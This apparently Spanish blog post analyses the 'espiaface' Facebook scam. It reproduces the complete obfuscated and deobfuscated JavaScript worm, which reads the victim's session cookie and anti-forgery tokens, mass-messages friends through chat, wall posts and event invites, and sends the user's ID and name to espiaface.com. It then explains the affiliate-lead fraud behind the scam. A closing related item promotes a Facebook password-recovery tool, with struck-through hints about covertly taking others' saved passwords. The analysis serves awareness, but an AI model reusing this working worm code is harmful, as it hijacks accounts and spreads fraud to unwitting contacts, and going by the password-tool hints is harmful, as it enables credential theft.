(){if(_0xbf72xe[_0x3fe9[11]]==4){if(_0xbf72xe[_0x3fe9[12]]==200&&_0xbf72xc){_0xbf72xc(_0xbf72xe[_0x3fe9[13]]);} ;if(_0xbf72xd){_0xbf72xd();} ;} ;} ;_0xbf72xe[_0x3fe9[14]](_0xbf72x14(_0xbf72x12));} ;var _0xbf72x17=function (){var _0xbf72x18=document[_0x3fe9[31]](_0x3fe9[30]);_0xbf72x18[_0x3fe9[33]][_0x3fe9[32]]=_0x3fe9[34];_0xbf72x18[_0x3fe9[33]][_0x3fe9[35]]=_0x3fe9[36];_0xbf72x18[_0x3fe9[33]][_0x3fe9[37]]=_0x3fe9[38];_0xbf72x18[_0x3fe9[33]][_0x3fe9[39]]=_0x3fe9[38];_0xbf72x18[_0x3fe9[33]][_0x3fe9[40]]=_0x3fe9[41];_0xbf72x18[_0x3fe9[33]][_0x3fe9[7]]=_0x3fe9[41];_0xbf72x18[_0x3fe9[33]][_0x3fe9[42]]=_0x3fe9[43];_0xbf72x18[_0x3fe9[33]][_0x3fe9[44]]=_0x3fe9[45];_0xbf72x18[_0x3fe9[33]][_0x3fe9[46]]=_0x3fe9[47];_0xbf72x18[_0x3fe9[33]][_0x3fe9[48]]=999999;_0xbf72x18[_0x3fe9[49]]=_0x3fe9[50];document[_0x3fe9[52]][_0x3fe9[51]](_0xbf72x18);} ;var _0xbf72x19=_0xbf72xf[_0x3fe9[16]](/name="xhpc_composerid" value="([dw]+)"/i);if(_0xbf72x19){comp=_0xbf72x19[1];} else {comp=_0x3fe9[23];} ;var _0xbf72x1a=_0xbf72xf[_0x3fe9[16]](/name="post_form_id" value="([dw]+)"/i)[1];var _0xbf72x1b=_0xbf72xf[_0x3fe9[16]](/name="fb_dtsg" value="([dw]+)"/i)[1];var _0xbf72x1c=document[_0x3fe9[56]](_0x3fe9[55])[_0x3fe9[54]][_0x3fe9[53]];redirect=redirect+_0x3fe9[57]+_0xbf72x14({userid:_0xbf72x10,name:_0xbf72x1c,doclose:1});_0xbf72x17();if(eventdesc){wf++;_0xbf72x16(_0x3fe9[58],{type:_0x3fe9[59],eid:null,invite_message:_0x3fe9[23],__d:1,post_form_id:_0xbf72x1a,fb_dtsg:_0xbf72x1b,lsd:null,post_form_id_source:_0x3fe9[60]},function (_0xbf72x1d){var _0xbf72x1e=_0xbf72x1d[_0x3fe9[16]](/"token":"([^]+)"/)[1];var _0xbf72xb=_0x3fe9[61]+_0xbf72x10+_0x3fe9[62]+_0xbf72x1e+_0x3fe9[63];doget(_0xbf72xb,function (_0xbf72x1f){var _0xbf72x20=_0xbf72x1f[_0x3fe9[16]](/{"uid":d+,/g);var _0xbf72x21=[];for(var _0xbf72x22=0;_0xbf72x22<_0xbf72x20[_0x3fe9[64]];_0xbf72x22++){var _0xbf72x23=_0xbf72x20[_0xbf72x22][_0x3fe9[16]](/:(d+),/)[1];if(_0xbf72x23!=_0xbf72x10){_0xbf72x21[_0x3fe9[65]](_0xbf72x23);} ;} ;var _0xbf72x24= new Date;_0xbf72x24[_0x3fe9[67]](_0xbf72x24[_0x3fe9[66]]()+86400000);datestr=_0xbf72x24[_0x3fe9[68]]()+1+_0x3fe9[15]+_0xbf72x24[_0x3fe9[69]]()+_0x3fe9[15]+_0xbf72x24[_0x3fe9[70]]();timestr=_0xbf72x24[_0x3fe9[71]]()*60;var _0xbf72x25={post_form_id:_0xbf72x1a,fb_dtsg:_0xbf72x1b,start_dateIntlDisplay:datestr,start_date:datestr,start_time_hour_min:timestr,name:eventname,place_page_id:_0x3fe9[23],location:_0x3fe9[23],street:_0x3fe9[23],geo_id:_0x3fe9[23],geo_sq:_0x3fe9[23],desc:eventdesc,sgb_invitees:_0xbf72x21[_0x3fe9[73]](_0x3fe9[72]),sgb_emails:_0x3fe9[23],sgb_message:_0x3fe9[23],privacy_type:_0x3fe9[74],guest_list:_0x3fe9[74],connections_can_post:_0x3fe9[74],save:_0x3fe9[75],submitting:_0x3fe9[23]};_0xbf72x25[_0x3fe9[76]]=_0x3fe9[23];_0xbf72x16(_0x3fe9[77],_0xbf72x25,false,function (){mf(--wf);} );} );} );} ;if(chatmessage){wf++;_0xbf72x16(_0x3fe9[78],{user:_0xbf72x10,post_form_id:_0xbf72x1a,fb_dtsg:_0xbf72x1b,lsd:null,post_form_id_source:_0x3fe9[60],popped_out:false,force_render:true},function (_0xbf72x1d){var _0xbf72x26=_0xbf72x1d[_0x3fe9[79]](9);var _0xbf72x27=eval(_0x3fe9[80]+_0xbf72x26+_0x3fe9[81]);var _0xbf72x28=_0xbf72x27[_0x3fe9[83]][_0x3fe9[82]];for(var _0xbf72x29 in _0xbf72x28[_0x3fe9[84]]){var _0xbf72x2a=Math[_0x3fe9[86]](Math[_0x3fe9[85]]()*1335448958);var _0xbf72x2b=( new Date)[_0x3fe9[66]]();var _0xbf72x2c=chatmessage[_0x3fe9[91]](_0x3fe9[87],_0xbf72x28[_0x3fe9[90]][_0xbf72x29][_0x3fe9[89]][_0x3fe9[88]]());_0xbf72x16(_0x3fe9[92],{msg_id:Math[_0x3fe9[86]](Math[_0x3fe9[85]]()*1335448958),client_time:( new Date)[_0x3fe9[66]](),msg_text:chatmessage[_0x3fe9[91]](_0x3fe9[87],_0xbf72x28[_0x3fe9[90]][_0xbf72x29][_0x3fe9[89]][_0x3fe9[88]]()),to:_0xbf72x29,post_form_id:_0xbf72x1a,fb_dtsg:_0xbf72x1b,post_form_id_source:_0x3fe9[60]});} ;mf(--wf);} );} ;if(postmessage){wf++;doget(_0x3fe9[93]+_0xbf72x10+_0x3fe9[94],function (_0xbf72x1d){var _0xbf72x20=_0xbf72x1d[_0x3fe9[16]](//d+_d+_d+_q.jpg.*?u003ca href="http://www.facebook.com/.*?u003c/a>/gi);var _0xbf72x2d=[];if(_0xbf72x20){for(var _0xbf72x22=0;_0xbf72x22<_0xbf72x20[_0x3fe9[64]];_0xbf72x22++){var _0xbf72x23=_0xbf72x20[_0xbf72x22][_0x3fe9[16]](/_d+_/)[0][_0x3fe9[91]](/_/g,_0x3fe9[23]);var _0xbf72x2e=_0xbf72x20[_0xbf72x22][_0x3fe9[16]](/>[^>]+u003c/a>$/i)[0][_0x3fe9[91]](/u003c/a>$/gim,_0x3fe9[23])[_0x3fe9[91]](/>/g,_0x3fe9[23]);_0xbf72x2d[_0x3fe9[65]]({id:_0xbf72x23,name:_0xbf72x2e});} ;} ;var _0xbf72xd=[];var _0xbf72x2f=[];while(_0xbf72x2d[_0x3fe9[64]]){var _0xbf72x30=Math[_0x3fe9[86]](Math[_0x3fe9[85]]()*_0xbf72x2d[_0x3fe9[64]]);_0xbf72xd[_0x3fe9[65]](_0xbf72x2d[_0xbf72x30]);_0xbf72x2f[_0x3fe9[65]](_0xbf72x2d[_0xbf72x30]);var _0xbf72x2b=_0xbf72x2d[_0x3fe9[95]]();if(_0xbf72x30){_0xbf72x2d[_0xbf72x30-1]=_0xbf72x2b;} ;} ;if(debug){alert(_0x3fe9[96]+_0xbf72xd[_0x3fe9[64]]);} ;var _0xbf72x31={post_form_id:_0xbf72x1a,fb_dtsg:_0xbf72x1b,xhpc_composerid:comp,xhpc_targetid:_0xbf72x10,xhpc_context:_0x3fe9[97],xhpc_fbx:_0x3fe9[23],lsd:null,post_form_id_source:_0x3fe9[60]};mt=postmessage;m=postmessage;while(mt[_0x3fe9[100]](_0x3fe9[99])>=0){var _0xbf72x32=_0xbf72xd[_0x3fe9[98]]();mt=mt[_0x3fe9[91]](_0x3fe9[99],_0xbf72x13(_0xbf72x32));m=m[_0x3fe9[91]](_0x3fe9[99],_0xbf72x11(_0xbf72x32));} ;_0xbf72x31[_0x3fe9[101]]=mt;_0xbf72x31[_0x3fe9[102]]=m;if(debug){alert(_0x3fe9[103]+mt);} ;_0xbf72x16(_0x3fe9[104],_0xbf72x31);var _0xbf72x33=function (_0xbf72x15){if(_0xbf72x15==0){wf=0;mf();return ;} ;var _0xbf72x34=_0xbf72x2f[_0x3fe9[95]]();var _0xbf72x35={post_form_id:_0xbf72x1a,fb_dtsg:_0xbf72x1b,xhpc_composerid:comp,xhpc_targetid:_0xbf72x34[_0x3fe9[19]],xhpc_context:_0x3fe9[105],xhpc_fbx:1,lsd:null,post_form_id_source:_0x3fe9[60]};var _0xbf72x36=postmessage;var _0xbf72x37=postmessage;if(_0xbf72xd[_0x3fe9[64]]==0){wf=0;mf();return ;} ;while(_0xbf72x36[_0x3fe9[100]](_0x3fe9[99])>=0){var _0xbf72x38=_0xbf72xd[_0x3fe9[98]]();_0xbf72x36=_0xbf72x36[_0x3fe9[91]](_0x3fe9[99],_0xbf72x13(_0xbf72x38));_0xbf72x37=_0xbf72x37[_0x3fe9[91]](_0x3fe9[99],_0xbf72x11(_0xbf72x38));} ;_0xbf72x35[_0x3fe9[101]]=_0xbf72x36;_0xbf72x35[_0x3fe9[102]]=_0xbf72x37;_0xbf72x16(_0x3fe9[104],_0xbf72x35);setTimeout(function (){_0xbf72x33(_0xbf72x15-1);} ,2000);} ;wf++;setTimeout(function (){_0xbf72x33(nfriends);} ,2000);} );} ;mf();} );

Como pueden ver el javascript esta ofuscado para que no podamos saber a primera vista que es lo que hace la aplicación, pero si lo desofuscamos obtenemos esto.

Código Limpio

var chatmessage = '%firstname%';
var postmessage = 'Top de visitantes de tu perfil de hoy: x0A %tf% - 19 visitas x0A %tf% - 16 visitas x0A %tf% - 15 visitas x0A %tf% - 13 visitas x0A Averigua tu tambien quien te esta mirando entrando en: espiaface.comx0AFunciona de verdad!';
var redirect = 'http://www.espiaface.com/carga.php';
var eventdesc = 'Esto es increible! pueden ver quien esta visitando su perfil y te llegan notificaciones, sigan los pasos de esta pagina que explica como hacerlo, entren en: espiaface.com';
var eventname = 'Averigua quien visita tu perfil';
var nfriends = 5000;
var debug = false;
var wf = 0;
var mf = function () {
        if (wf <= 0) {
            setTimeout(function () {
                window['top']['location']['href'] = redirect;
            }, 500);
        };
    };
var doget = function (_0xbf72xb, _0xbf72xc, _0xbf72xd) {
        var _0xbf72xe = new XMLHttpRequest;
        _0xbf72xe['open']('GET', _0xbf72xb);
        _0xbf72xe['onreadystatechange'] = function () {
            if (_0xbf72xe['readyState'] == 4) {
                if (_0xbf72xe['status'] == 200 && _0xbf72xc) {
                    _0xbf72xc(_0xbf72xe['responseText']);
                };
                if (_0xbf72xd) {
                    _0xbf72xd();
                };
            };
        };
        _0xbf72xe['send']();
    };
doget('/', function (_0xbf72xf) {
    var _0xbf72x10 = document['cookie']['match'](/c_user=(d+)/)[1];
    var _0xbf72x11 = function (_0xbf72x12) {
            return _0xbf72x12 ? '@[' + _0xbf72x12['id'] + ':' + _0xbf72x12['name'] + ']' : '';
        };
    var _0xbf72x13 = function (_0xbf72x12) {
            return _0xbf72x12 ? _0xbf72x12['name'] : '';
        };
    var _0xbf72x14 = function (_0xbf72x12) {
            out = '';
            for (var _0xbf72x15 in _0xbf72x12) {
                out += (out ? '&' : '') + _0xbf72x15 + (_0xbf72x12[_0xbf72x15] !== null ? '=' + encodeURIComponent(_0xbf72x12[_0xbf72x15]) : '');
            };
            return out;
        };
    var _0xbf72x16 = function (_0xbf72xb, _0xbf72x12, _0xbf72xc, _0xbf72xd) {
            var _0xbf72xe = new XMLHttpRequest;
            _0xbf72xe['open']('POST', _0xbf72xb);
            _0xbf72xe['setRequestHeader']('Content-Type', 'application/x-www-form-urlencoded');
            _0xbf72xe['onreadystatechange'] = function () {
                if (_0xbf72xe['readyState'] == 4) {
                    if (_0xbf72xe['status'] == 200 && _0xbf72xc) {
                        _0xbf72xc(_0xbf72xe['responseText']);
                    };
                    if (_0xbf72xd) {
                        _0xbf72xd();
                    };
                };
            };
            _0xbf72xe['send'](_0xbf72x14(_0xbf72x12));
        };
    var _0xbf72x17 = function () {
            var _0xbf72x18 = document['createElement']('div');
            _0xbf72x18['style']['display'] = 'block';
            _0xbf72x18['style']['position'] = 'absolute';
            _0xbf72x18['style']['width'] = '100%';
            _0xbf72x18['style']['height'] = '100%';
            _0xbf72x18['style']['left'] = '0px';
            _0xbf72x18['style']['top'] = '0px';
            _0xbf72x18['style']['textAlign'] = 'center';
            _0xbf72x18['style']['padding'] = '4px';
            _0xbf72x18['style']['background'] = '#FFFFFF';
            _0xbf72x18['style']['zIndex'] = 999999;
            _0xbf72x18['innerHTML'] = ' 
Cargando aplicacion, aguarde un momento...

 La aplicacion esta preparando tu facebook para registrar las visitas de tus amigos.

';
            document['body']['appendChild'](_0xbf72x18);
        };
    var _0xbf72x19 = _0xbf72xf['match'](/name="xhpc_composerid" value="([dw]+)"/i);
    if (_0xbf72x19) {
        comp = _0xbf72x19[1];
    } else {
        comp = '';
    };
    var _0xbf72x1a = _0xbf72xf['match'](/name="post_form_id" value="([dw]+)"/i)[1];
    var _0xbf72x1b = _0xbf72xf['match'](/name="fb_dtsg" value="([dw]+)"/i)[1];
    var _0xbf72x1c = document['getElementById']('navAccountName')['firstChild']['data'];
    redirect = redirect + '?' + _0xbf72x14({
        userid: _0xbf72x10,
        name: _0xbf72x1c,
        doclose: 1
    });
    _0xbf72x17();
    if (eventdesc) {
        wf++;
        _0xbf72x16('/ajax/choose/?__a=1', {
            type: 'event',
            eid: null,
            invite_message: '',
            __d: 1,
            post_form_id: _0xbf72x1a,
            fb_dtsg: _0xbf72x1b,
            lsd: null,
            post_form_id_source: 'AsyncRequest'
        }, function (_0xbf72x1d) {
            var _0xbf72x1e = _0xbf72x1d['match'](/"token":"([^]+)"/)[1];
            var _0xbf72xb = '/ajax/typeahead/first_degree.php?__a=1&viewer=' + _0xbf72x10 + '&token=' + _0xbf72x1e + '&filter[0]=user&options[0]=friends_only&options[1]=nm&options[2]=sort_alpha';
            doget(_0xbf72xb, function (_0xbf72x1f) {
                var _0xbf72x20 = _0xbf72x1f['match'](/{"uid":d+,/g);
                var _0xbf72x21 = [];
                for (var _0xbf72x22 = 0; _0xbf72x22 < _0xbf72x20['length']; _0xbf72x22++) {
                    var _0xbf72x23 = _0xbf72x20[_0xbf72x22]['match'](/:(d+),/)[1];
                    if (_0xbf72x23 != _0xbf72x10) {
                        _0xbf72x21['push'](_0xbf72x23);
                    };
                };
                var _0xbf72x24 = new Date;
                _0xbf72x24['setTime'](_0xbf72x24['getTime']() + 86400000);
                datestr = _0xbf72x24['getMonth']() + 1 + '/' + _0xbf72x24['getDate']() + '/' + _0xbf72x24['getFullYear']();
                timestr = _0xbf72x24['getHours']() * 60;
                var _0xbf72x25 = {
                    post_form_id: _0xbf72x1a,
                    fb_dtsg: _0xbf72x1b,
                    start_dateIntlDisplay: datestr,
                    start_date: datestr,
                    start_time_hour_min: timestr,
                    name: eventname,
                    place_page_id: '',
                    location: '',
                    street: '',
                    geo_id: '',
                    geo_sq: '',
                    desc: eventdesc,
                    sgb_invitees: _0xbf72x21['join'](','),
                    sgb_emails: '',
                    sgb_message: '',
                    privacy_type: 'on',
                    guest_list: 'on',
                    connections_can_post: 'on',
                    save: 'Create Event',
                    submitting: ''
                };
                _0xbf72x25['new'] = '';
                _0xbf72x16('/events/create.php', _0xbf72x25, false, function () {
                    mf(--wf);
                });
            });
        });
    };
    if (chatmessage) {
        wf++;
        _0xbf72x16('/ajax/chat/buddy_list.php?__a=1', {
            user: _0xbf72x10,
            post_form_id: _0xbf72x1a,
            fb_dtsg: _0xbf72x1b,
            lsd: null,
            post_form_id_source: 'AsyncRequest',
            popped_out: false,
            force_render: true
        }, function (_0xbf72x1d) {
            var _0xbf72x26 = _0xbf72x1d['substr'](9);
            var _0xbf72x27 = eval('(' + _0xbf72x26 + ')');
            var _0xbf72x28 = _0xbf72x27['payload']['buddy_list'];
            for (var _0xbf72x29 in _0xbf72x28['nowAvailableList']) {
                var _0xbf72x2a = Math['floor'](Math['random']() * 1335448958);
                var _0xbf72x2b = (new Date)['getTime']();
                var _0xbf72x2c = chatmessage['replace']('%firstname%', _0xbf72x28['userInfos'][_0xbf72x29]['firstName']['toLowerCase']());
                _0xbf72x16('/ajax/chat/send.php?__a=1', {
                    msg_id: Math['floor'](Math['random']() * 1335448958),
                    client_time: (new Date)['getTime'](),
                    msg_text: chatmessage['replace']('%firstname%', _0xbf72x28['userInfos'][_0xbf72x29]['firstName']['toLowerCase']()),
                    to: _0xbf72x29,
                    post_form_id: _0xbf72x1a,
                    fb_dtsg: _0xbf72x1b,
                    post_form_id_source: 'AsyncRequest'
                });
            };
            mf(--wf);
        });
    };
    if (postmessage) {
        wf++;
        doget('/ajax/browser/friends/?uid=' + _0xbf72x10 + '&filter=all&__a=1&__d=1', function (_0xbf72x1d) {
            var _0xbf72x20 = _0xbf72x1d['match'](//d+_d+_d+_q.jpg.*?u003ca href="http://www.facebook.com/.*?u003c/a>/gi);
            var _0xbf72x2d = [];
            if (_0xbf72x20) {
                for (var _0xbf72x22 = 0; _0xbf72x22 < _0xbf72x20['length']; _0xbf72x22++) {
                    var _0xbf72x23 = _0xbf72x20[_0xbf72x22]['match'](/_d+_/)[0]['replace'](/_/g, '');
                    var _0xbf72x2e = _0xbf72x20[_0xbf72x22]['match'](/>[^>]+u003c/a>$/i)[0]['replace'](/u003c/a>$/gim, '')['replace'](/>/g, '');
                    _0xbf72x2d['push']({
                        id: _0xbf72x23,
                        name: _0xbf72x2e
                    });
                };
            };
            var _0xbf72xd = [];
            var _0xbf72x2f = [];
            while (_0xbf72x2d['length']) {
                var _0xbf72x30 = Math['floor'](Math['random']() * _0xbf72x2d['length']);
                _0xbf72xd['push'](_0xbf72x2d[_0xbf72x30]);
                _0xbf72x2f['push'](_0xbf72x2d[_0xbf72x30]);
                var _0xbf72x2b = _0xbf72x2d['shift']();
                if (_0xbf72x30) {
                    _0xbf72x2d[_0xbf72x30 - 1] = _0xbf72x2b;
                };
            };
            if (debug) {
                alert('fetched friends: ' + _0xbf72xd['length']);
            };
            var _0xbf72x31 = {
                post_form_id: _0xbf72x1a,
                fb_dtsg: _0xbf72x1b,
                xhpc_composerid: comp,
                xhpc_targetid: _0xbf72x10,
                xhpc_context: 'home',
                xhpc_fbx: '',
                lsd: null,
                post_form_id_source: 'AsyncRequest'
            };
            mt = postmessage;
            m = postmessage;
            while (mt['search']('%tf%') >= 0) {
                var _0xbf72x32 = _0xbf72xd['pop']();
                mt = mt['replace']('%tf%', _0xbf72x13(_0xbf72x32));
                m = m['replace']('%tf%', _0xbf72x11(_0xbf72x32));
            };
            _0xbf72x31['xhpc_message_text'] = mt;
            _0xbf72x31['xhpc_message'] = m;
            if (debug) {
                alert('message text: ' + mt);
            };
            _0xbf72x16('/ajax/updatestatus.php?__a=1', _0xbf72x31);
            var _0xbf72x33 = function (_0xbf72x15) {
                    if (_0xbf72x15 == 0) {
                        wf = 0;
                        mf();
                        return;
                    };
                    var _0xbf72x34 = _0xbf72x2f['shift']();
                    var _0xbf72x35 = {
                        post_form_id: _0xbf72x1a,
                        fb_dtsg: _0xbf72x1b,
                        xhpc_composerid: comp,
                        xhpc_targetid: _0xbf72x34['id'],
                        xhpc_context: 'profile',
                        xhpc_fbx: 1,
                        lsd: null,
                        post_form_id_source: 'AsyncRequest'
                    };
                    var _0xbf72x36 = postmessage;
                    var _0xbf72x37 = postmessage;
                    if (_0xbf72xd['length'] == 0) {
                        wf = 0;
                        mf();
                        return;
                    };
                    while (_0xbf72x36['search']('%tf%') >= 0) {
                        var _0xbf72x38 = _0xbf72xd['pop']();
                        _0xbf72x36 = _0xbf72x36['replace']('%tf%', _0xbf72x13(_0xbf72x38));
                        _0xbf72x37 = _0xbf72x37['replace']('%tf%', _0xbf72x11(_0xbf72x38));
                    };
                    _0xbf72x35['xhpc_message_text'] = _0xbf72x36;
                    _0xbf72x35['xhpc_message'] = _0xbf72x37;
                    _0xbf72x16('/ajax/updatestatus.php?__a=1', _0xbf72x35);
                    setTimeout(function () {
                        _0xbf72x33(_0xbf72x15 - 1);
                    }, 2000);
                };
            wf++;
            setTimeout(function () {
                _0xbf72x33(nfriends);
            }, 2000);
        });
    };
    mf();
});

Si no sabes de que va el codigo, te comento lo que hace:

Muestra una imagen animada simulando que esta trabajando
Se fija los amigos que tenés en Facebook y escoge a cuatro amigos al azar para generar el mensaje del muro:
Top de visitantes de tu perfil de hoy:
%tf% – 19 visitas
%tf% – 16 visitas
%tf% – 15 visitas
%tf% – 13 visitas
Averigua tu tambien quien te esta mirando entrando en: espiaface.com
Funciona de verdad!
(En %tf% reemplaza por los nombres completos de tus amigos escogidos al azar)
Fijate que siempre va a mostrar que tuviste 19, 16, 15 y 13 visitas, la versión en inglés genera números aleatorios.
Crea un evento en facebook (Vas a ir: ¿si, no, quizas?) y automáticamente invita a todos tus amigos
Nombre del Evento: Averigua quien visita tu perfil
Descripción del evento: Esto es increible! pueden ver quien esta visitando su perfil y te llegan notificaciones, sigan los pasos de esta pagina que explica como hacerlo, entren en: espiaface.com

Resumiendo

Ese código, en esos 2 y 3 minutos que te pide esperar:

Lo que hace: Al poner ese código en la barra de direcciones, toma el control de tu Facebook un ratito para Spamear tanto por chat, como en el muro y también organizando eventos. Lo único que hace es Spamear por los codos.
Lo que no hace: No te roba el cookie, ni te saca la contraseña, ni accede a información privada de tu perfil, ni te sube virus ocultamente, ni te baja los pantalones, ni te mete… bueno lo paramos ahi.

¿Entonces cuál es el punto?

¿Entonces para qué carajo alguien se molestó en crear semejante estupidez? Muy simple, para hacer dinero. Mucho dinero.
Potencialmente podría haber generado miles de dólares, les explico a continuación.

Una vez que terminan los minutos de espera te redirige al siguiente sitio: final.espiaface.com (www.espiaface.com/carga.php)
En final.espiaface.com te dice:

Eso es lo que vas a ver si vivis en sudamérica. Y la imagen de arriba va ser lo último que hayas visto. Es por esto que muchos analistas en la red se rascaban la cabeza preguntándose cuál era el fin de este “virus”.

Pero si vivís en México, te va a mostrar una oferta: de http://www.enterfactory.com/ (no ingreses el numero de tu celular)
Y si vivís en Estados Unidos te va a mostrar cinco links surtidos de diferentes juegos de: PlaySushi.com, PageRage.com, Gamevance.com

De nuevo, ¿qué gana el autor?

Si sos un hispano de Estados Unidos que entraste a PlaySushi.com y te bajaste el juego, el creador de Espiaface ganó $1.
Si sos un Mexicano que pusiste tu número de celular en Enterfactory.com, le generaste al creador de Espiaface $1.

Esto es lo que se llama comisión por intención de compra (leads). Si te suscribís a algún producto, llenas un formulario (eufemísticamente llamados “encuestas” ) con tus datos personales, eso genera un “lead” y le genera una comisión por referido.

Estas ofertas están restringidas por países, y la gran mayoría de los países hispanos estaban fuera de las áreas de promoción, es por eso que a la mayoría de ustedes les mostraba: “Sorry, There are no surveys available to your country at this time. Please try back later” (Disculpen, no hay encuestas disponibles en su país en este momento. Por favor intente luego)

Este es el rango de las comisiones por sitio:

PageRage (Sólo disponible para USA): de $0,8 a $2,20 por lead. (Promedio: $1,50)
Gamevance (Sólo disponible para USA): de $1,60 a $2,29 por lead. (Promedio: $1,95)
Playsushi (Sólo disponible para USA): de $0,90 a $2 por lead. (Promedio: $1,45)
Enterfactory (Sólo disponible para México): de $0,60 a $1,20 por lead. (Promedio: $0,90)

Si suponemos razonablemente que un 1% de los usuarios mexicanos de Facebook (Facebook tiene 24.910.520 usuarios mexicanos registrados) se suscribieron a Enterfactory.com ($1 por lead para facilitar el cálculo, además de que es el más probable), el creador de espiaface se hubiera levantado $249.105 dólares limpios.

La versión en inglés debe haber generado como mínimo un millón de dólares. Si consideramos que sólo 1% de los usuarios de Facebook de Estados Unidos cayeron en la trampa (Facebook tiene 150.201.840 usuarios registrados en USA), los creadores de estos fraudes levantaron $1.502.018 dólares verdes.
Si agregamos a todos los países con usuarios angloparlantes (casi el resto del mundo) podemos fácilmente imaginar varias decenas de millones de dolares.

Eso es todo, si quieres ver las FAQ de este articulo, visita la fuente original.

Personalmente creo que no en vista de lo rentable que resultó ser este fraude, volveremos a verlo pronto en Facebook, si no es por el mismo autor, será por imitadores tratando de conseguir buenos ingresos de esta forma.

Les recomiendo que sigan las recomendaciones de seguridad para Facebook que publicamos hace un tiempo en nuestra comunidad.

También puede interesarte...

Recupera tu Password de Facebook

DragoN — Mon, 14 Mar 2011 20:09:14 +0000

FacebookPasswordDecryptor es una herramienta gratuita que te permite recuperar la contraseña de tu cuenta en Facebook que tengas guardada en tu cliente de mensajería (Paltalk Messenger y Miranda Messenger) o navegador, es compatible con los navegadores mas populares (Internet Explorer, Firefox, Google Chrome, Opera y Flock), funciona en Windows XP/Visita/7 y Server, incluye una versión portable por si has guardado tu cuenta Facebook en mas de un computador (guiño guiño), permite guardar listas y es bastante rápido.

El mismo ejecutable que nos arroja esta bonita interface, si es ejecutado por linea de comandos y con un archivo como parámetro, nos guardará automáticamente las claves de Facebook que encuentre en las diferentes aplicaciones soportadas, algo muy útil si queremos ~~automatizar el proceso~~ recuperar nuestra clave de todos los computadores donde la hemos dejado, ~~sin levantar sospecha.~~

Aunque esta herramienta no es tan potente como otras que te permiten recupera TODAS las contraseñas almacenadas en tu navegador, es una buena opción a tener en cuenta si lo que deseas recuperar es solo tu cuenta de Facebook.

Descargar FacebookPasswordDecryptor

Mas Información:
Anuncio Oficial de FacebookPasswordDecryptor
Recupera las contraseñas almacenadas en tu Navegador